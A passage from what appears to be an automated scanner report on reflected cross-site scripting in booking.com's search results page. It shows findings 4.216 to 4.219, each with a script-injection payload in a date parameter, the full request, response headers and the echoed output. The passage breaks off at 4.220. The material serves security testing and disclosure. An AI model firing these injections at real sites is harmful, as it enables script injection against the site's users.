s://secure.booking.com/login.html?op=remind;lang=en;go_back_url=http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10f3bff"><script>alert(1)</script>baf172468a&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717">
...[SNIP]...
4.216. http://www.booking.com/searchresults.html [checkout_monthday parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the checkout_monthday request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7bb98</script><script>alert(1)</script>b608cf5487c was submitted in the checkout_monthday parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=077bb98</script><script>alert(1)</script>b608cf5487c&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:21:00 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YdN864bAdMj5F%2B8LyEAy9%2BENkbBkfkD3xhmWaR2GVCPzzKfUTiby6MVy7BO30HJ3O9pLiRU%2BmjHeEQw7IVRPh%2BJlCBA6Rg9LeHlyVInUowzj92f0uZRiZ3zREWkxGzzctCPIkvIgmCBgVE7HG2EUgxqaaYsBnRjvOFNwJnK1E10WP98kj12MLYEpA2qGv7iIHej9tJ6yq4lrodaa0LgjERYrKGSiuk4pzNPhT81Tb05jjgaoOpX%2Be1G74P%2BI8qLRNm3n%2FfBjZ63vqR5Klv3HnK%2Fu10sz3AILCjNTqYk2GbEogMX3Q7BZxqjZu%2BRa%2BsIS7Z74wEjXDgFdTq3WzZ31Pvm%2FF7BoFfo%2BkL1UEStqg%2BFXgeFPtcdhqwSwzvUCe4dloObgBvuf56hTXCikBWZxZESOalIIMPtA3u8ry1t37PWvOJdj9O9dT1XPU4hVo6PE8%2BI6WxJcLAxgaa%2BBB8qRL0pmnmV73%2B1TUNGxc5enITyYDEMasrT3HrzWfSbn2Xt%2BjZwsbfrmcCtBNsJpJYFUU1w1bedldOMeVR3BXgA8lDkcYo8K%2FTTYAIyHA0Lsr09JokMs5ALka3cQtZCNMuO2EFyV2kAt7hIOEbQmvxb55DcpxZNcbN1VtSBNRsoejhBAgGxzOLIkGWSz4Hyr3t6XtOJZa6%2F1qllBOMABsviYeA3G35Ecky4fNVtZ33zbF7AVwZRd7n6nLw6YHE32227sh4B8VL2i41%2BDzYJNeuIuTxxrSvxp7VDQFXzlDkv4rcaDsR%2FBLPM1tTG8JOBPE6Q2%2BxU7i5NDdLLAVjGlI%2B0bpLrragF5REg29Fp6lh2ElQnuo3mKbUfvDT%2BtfFYjmRZI2yz7UtbRIxrZmngAKoSXVyb7ive7rxYiZkIxQZUh0BPJ1OUFIKcmT5hpooSTJLq38TYlNLr7QWdAF7YF%2BQti%2BFeMXefR3pMO2U7eF%2F0tLMmmZqJdDJaglUgp0r64jc6mfRyB14Dxm%2B5dd%2BOOOAaaEpgpeoBQVy0EsQRQVv8ydRCv2fzE%2FApk%2BEFcHYMmMmiXesyKPBDoPSOCrBTpeA2RJlHnuTPu9KnWmE1sUS7lal1ZhPj0ruyxACkRlb1Dnk2saemzYg2PHnns7V%2BNdIUdFJlCKp8Ocs62mJjW19yGvZZ3j445lGhyLrnAqH9AbJJ5qIZ63XRTe%2Bq8oAYIfXLu5RT6XA1Nr520v69IfC8Ldh9lDRrY1mfvbdFBXbQZ%2BAL%2BrXRqPAtZrmVYfK%2BPou%2F%2BZ4e%2FpmMH%2Fgir%2Fy4vCXhSV%2FU7nbxLJsVBf1JVXay6ozBkqj34prs5hvCIA6Ed%2BGetDiYGMMwIVlQF27TLvqSaLePOcZ6BuV7%2BJ4veERMU6lMlOlcvOslEY6kXfyxdfC%2BOtfI%2BYgt1m%2Fs8tpO%2FiAP2R5J8mZYffBh9rSfdP%2FhnI6nzUdBn9sts8SphFb%2BRYNO3iIvfXzNHovWtnSs8j5FkC2pnYA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:21:00 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 267240
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
n_end : '.booking.com',
b_original_url : 'http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=077bb98</script><script>alert(1)</script>b608cf5487c&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717',
b_this_url : '/searchresults.en-us.html?aid=335591;label=ufi-P20061717;sid=9
...[SNIP]...
4.217. http://www.booking.com/searchresults.html [checkout_monthday parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the checkout_monthday request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b25ce"><script>alert(1)</script>ef94838552f was submitted in the checkout_monthday parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07b25ce"><script>alert(1)</script>ef94838552f&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:20:19 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YdN864bAdMj5F%2B8LyEAy9%2BENkbBkfkD3xhmWaR2GVCPzzKfUTiby6MVy7BO30HJ3O9pLiRU%2BmjHeEQw7IVRPh%2BJlCBA6Rg9LeHlyVInUowzj92f0uZRiZ3zREWkxGzzctCPIkvIgmCBgVE7HG2EUgxqaaYsBnRjvOFNwJnK1E10WP98kj12MLYEpA2qGv7iIHej9tJ6yq4lrodaa0LgjERYrKGSiuk4pzNPhT81Tb05jjgaoOpX%2Be1G74P%2BI8qLRNm3n%2FfBjZ63vqR5Klv3HnK%2Fu10sz3AILCjNTqYk2GbEogMX3Q7BZxqjZu%2BRa%2BsIS7Z74wEjXDgFdTq3WzZ31Pvm%2FF7BoFfo%2BkL1UEStqg%2BFXgeFPtcdhqwSwzvUCe4dloObgBvuf56hTXCikBWZxZESOalIIMPtA3u8ry1t37PWvOJdj9O9dT1XPU4hVo6PE8%2BI6WxJcLAxgaa%2BBB8qRL0pmnmV73%2B1TUNGxc5enITyYDEMasrT3HrzWfSbn2Xt%2BjZwsbfrmcCtBNsJpJYFUU1w1bedldOMeVR3BXgA8lDkcYo8K%2FTTYAIyHA0Lsr09JokMs5ALka3cQtZCNMuO2EFyV2kAt7hIOEbQmvxb55DcpxZNcbN1VtSBNRsoejhBAgGxzOLIkGWSz4Hyr3t6XtOJZa6%2F1qllBOMABsviYeA3G35Ecky4fNVtZ33zbF7AVwZRd7n6nLw6YHE32227sh4B8VL2i41%2BDzYJNeuIuTxxrSvxp7VDQFXzlDkv4rcaDsR%2FBLPM1tTG8JOBPE6Q2%2BxU7i5NDdLLAVjGlI%2B0bpLrragF5REg29Fp6lh2ElQnuo3mKbUfvDT%2BtfFYjmRZI2yz7UtbRIxrZmngAKoSXVyb7ive7rxYiZkIxQZUh0BPJ1OUFIKcmT5hpooSTJLq38TYlNLr7QWdAF7YF%2BQti%2BFeMXefR3pMO2U7eF%2F0tLMmmZqJdDJaglUgp0r64jc6mfRyB14Dxm%2B5dd%2BOOOAaaEpgpeoBQVy0EsQRQVv8ydRCv2fzE%2FApk%2BEFcHYMmMmiXesyKPBDoPSOCrBTpeA2RJlHnuTPu9KnWmE1sUS7lal1ZhPj0ruyxACkRlb1Dnk2saemzYg2PHnns7V%2BNdIUdFJlCKp8Ocs62mJjW19yGvZZ3j445lGhyLrnAqH9AbJJ5qIZ63XRTe%2Bq8oAYIfXLu5RT6XA1Nr520v69IfC8Ldh9lDRrY1mfvbdFBXbQZ%2BAL%2BrXRqPAtZrmVYfK%2BPou%2F%2BZ4e%2FpmMH%2Fgir%2Fy4vCXhSV%2FU7nbxLJsVBf1JVXay6ozBkqj34prs5hvCIA75fTpA3DvwQ%2FidlvUr4nO0Wmqr2BWcJVidx0amQjZ5bgypmX%2BX49Fp0D0tWT0q60dD3Xk7DmsN86Hmq74oRKHieX7I5Mip7AVDp65CTOl%2FAiqBvpx%2FQYRe1HN42RJRGu27Hcr9v52E7YISkfl%2FLdINgkvPNWV8ndg%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:20:19 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 267221
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
m/login.html?op=remind;lang=en;go_back_url=http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07b25ce"><script>alert(1)</script>ef94838552f&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717">
...[SNIP]...
4.218. http://www.booking.com/searchresults.html [checkout_year_month parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the checkout_year_month request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ffa6"><script>alert(1)</script>558c8ba7e66 was submitted in the checkout_year_month parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-104ffa6"><script>alert(1)</script>558c8ba7e66&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:21:13 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDblaNcgygeBHdE9Iiq6hiTqoOuVSa5d5qA8G933RR9JZEMeKyBF3iXy5IV7SWB2Rm%2BJu%2FS7rRKblOQWDKAIIa3zOOjG8HnHIMCMTIAYH96r4vnMDn4hVMpaoWqMN99reFqurSwqilEKN1PrULubwyckXc1TvPQ7lppvCjITG2c02aj9wyuptZvLQxSwozEUDVCRDcBPcGtfYmV8e%2FkBh57BZ%2BS9UDUr0XtV27vUQKGqXHdvhwqOxWjp6xQZ6VDVOOxePM%2FNhkbXqwPET4vbX2k8BO94UgvtPkObwxIUUTQMK%2BnMyltezEFfqDTSEE%2FQgKagA4d0dcivnNDysp9VymyfmbRGAVjyfwktifeQKCkrNR4EpHZM8I0PRYAWxYNUHljqb4WLA5j0rvNMArpfS32dS0UnaFa9YoMnNXQStSAJZbVr86x8S%2Fjh7JRHywVnx%2F4hWMWl9o1Y46IR9Qv3R7jrR3xYNriItNCylUqYUEu%2B61opsa3ogheFDWnwcjN7iMMEPHi%2FpNQLMTA%2BMjPCubmqu9LNESvP2geV71Pw7rw8D2Z63%2B%2FDc%2FVpyhoXWJSYVT14OAgBU79IOfNWx%2FUfA8a86v3RuqFMhiJ%2BZqOCGASysLvZCEdItR9Mwjs%2Bbm%2FM7H%2B0vt91pBecBin%2F%2BmXJ2Mlv61rd%2FVyEBsWwc%2BkQTXvWQ8iy2qSHuNN5zwKD0PeZj3cEZk04VKx2d5Fk5B9V%2B%2BjH3EBhdfA7x8QoSjFSLx4m%2BjW9lpIzXt2FNu4m9GAzxLA7NWlQPhXAeOt6GiDtC%2F4pgQmtxfWpw9P5X%2F31DBQaFZO9ihRTr%2BBGbA8tiJgKjHFkeswABUqPzCDeVemrqtxhBeIYFI59hH3U%2Fx%2Fx8bNz281CB2RhCdI3C4ZBScsixTxyxnXMmJb4ueETZ%2Bno7s0HiMyH3as3oyeD2BS5t32gYuXH6NiZsZF6CuKnepk2vwr552BQs8k8a2aqEuiJSnP%2FKB6yA57752uXApW1mIE9cujvwOWrWOTAV42QxM0pP1rCPNlUGedPLKSQK15PF5DN1Zp%2BmNC7mYXJV2SnNX27lgivMuRPn9W1GbmcZdVF27cBhmp1LNTgFt%2BIWRJnrV4lVcwRDNIWQoY6JRgTzhdL9Y9Ywma%2BbnPFvtE9D6QctByv%2BXNxTgmjBbnpvnch3cnlhIjFzai6VAxqxZJGAogok5ZwjXX6ufXXIO9WFokfAdqMJL7Rba8I6Wbv4dg8p89GLWVzGQUWh70mr7WxIwVa%2BtGndX1VFUfKV23bvDSMsVJLZyvJZ%2Fv2oV%2FLRTw2a0x03B1Hmgei5X0jd6IIjSimgKl%2F4nuP97tX3Bt%2FSwTkxUGrc%2BVK3EiylmY55%2Ftjcip138nHkpDWuT%2FvhiRFTf%2BFNWmSwDFqh%2FlLGUK4zteSMt09KVkUghSi1oJMKnl497vOz6ooVQtgR0EAKiPjT1g1omKBAvEw8wVQ%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:21:14 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 275535
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_se
...[SNIP]...
en;go_back_url=http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-104ffa6"><script>alert(1)</script>558c8ba7e66&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717">
...[SNIP]...
4.219. http://www.booking.com/searchresults.html [checkout_year_month parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the checkout_year_month request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b91ee</script><script>alert(1)</script>53f99955b17 was submitted in the checkout_year_month parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10b91ee</script><script>alert(1)</script>53f99955b17&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:21:41 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YdN864bAdMj5F%2B8LyEAy9%2BENkbBkfkD3xhmWaR2GVCPzzKfUTiby6MVy7BO30HJ3O9pLiRU%2BmjHeAghaEqdpI0sWrfrPQoZsDjHuqQLaOOyEtkQqeR3CSO3o0YQ0OdU7%2FTulVsRFOKol7qaucnXEddDTOiWnUxPng655yrv7j0OnPbiANbKxMmMVUcO7TD4jq7StNe641WxIo1hKXeC%2FY6xhxMwbleoTm%2Bdcr9GhZzEGlmDT4FOr11YIUKTPXO595HaWiAzqprNhSsrn%2BwgmIwRdVElEcYlsDWwKIhhdJAcyks3AvzF0fzxUbTTBaCfi2z25XU4RMilJiE3b%2BGcO76qiXtdBiwvSRXnAWWETITcRNnIqerN1vS93Sqsin50JCdB41XoMj5DAznAh1DfrjJdhciUMNw58L9QV0E%2Fp85dysV2znLmWy0pToeKMBqFmHDz9ozl7Gh40OeuV1WnwTW%2FD%2BROFSISj0UrhfSyFw4wi8cR2wnTboCKPkvSE36IYJr51nGpbP4O6ZyBvVEnGjCMQkcuMKlvgZFsVA3%2BuLZoF7SP4sk4%2FRaDFQsVW%2FpSWlunwGpuunjoSBLnP%2BWvj%2BZ1XoLnmqYPTXCpVFoIKmeuCB22vHMUj95qDuLYq50rodOkiv00fKeH8gk5eCEspyOMncJJoehaMl0dW71UQGnmI1nOPQuyDdpmcpl7flquS67uIurk76LpAxez%2BxtZ0J5tPSfKlbPfT7HNyZLYEi2yzSafxYI%2FKZWf0DPcLVc%2FMXBXvbExWaTOyizFy8E%2F2QRPAYX6kt096xHaE8KjI2AsqbIHR2Mdk9Jx9IGfi9emUM3M2RtLjCe3NJkp7Z%2FTsafci7WggjIFrh%2FDbX9vKfeXcoXrdgLglYiZOIwzL9mBUpIgqVGxOiDUbgUsaGPK1M748iR7UYlfm0yFnJDiYdfAbH4ItD9c9dw5KLzGwhWQg8guuwDCGNyIBxm8BJdBkfHYanf1ao2VBnBqcvjFeEWPs7bXsFMBbvghd8WvpCJlexsbFIcpmJnYE%2F7zt%2Bnoht%2F54gB0b9ONvTnvlQrDm1wVQmJ80NFqDMCZVBx%2Byxvid%2BvkpciMfPWigTJ%2F6sNdpkzQ5Wam7AoGR0zaKCYhIISTo1kF7he97PwwqepQS8y%2BISWsX9ONkD3X9H0GiatGlVDYQBfU3vGS2LR4AhpHMjj1Ny6Y1McR1WhdodBwUc5%2BV7KGrR7XkkUjGeoXW1TGSn0yGhbDvi3Ve8wwqg49QcsBfVuwBSAsf1MKC7UYzNdp2DN9%2BLoUK%2FcPJhIW1ACbJN429NjVDEMxZOYFsaH3%2F%2BW32CIambsCCXTFTpzdcehxgGh%2Bdk1eWXvZZk8fFvDY%2FLWCAOK2Xx%2BAeyrwZBIJy3CMJ5miaS4GVNA6d5YiGnk3RtfpSsy4Il30sBlYFyli3XIPldt3bEnEInvdG6skszprUmnkyJcEI0VpOyq52Q0caBA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:21:41 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 275555
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_se
...[SNIP]...
riginal_url : 'http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10b91ee</script><script>alert(1)</script>53f99955b17&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717',
b_this_url : '/searchresults.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca
...[SNIP]...
4.220. http://www.booking.com/searchresults.html [city parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

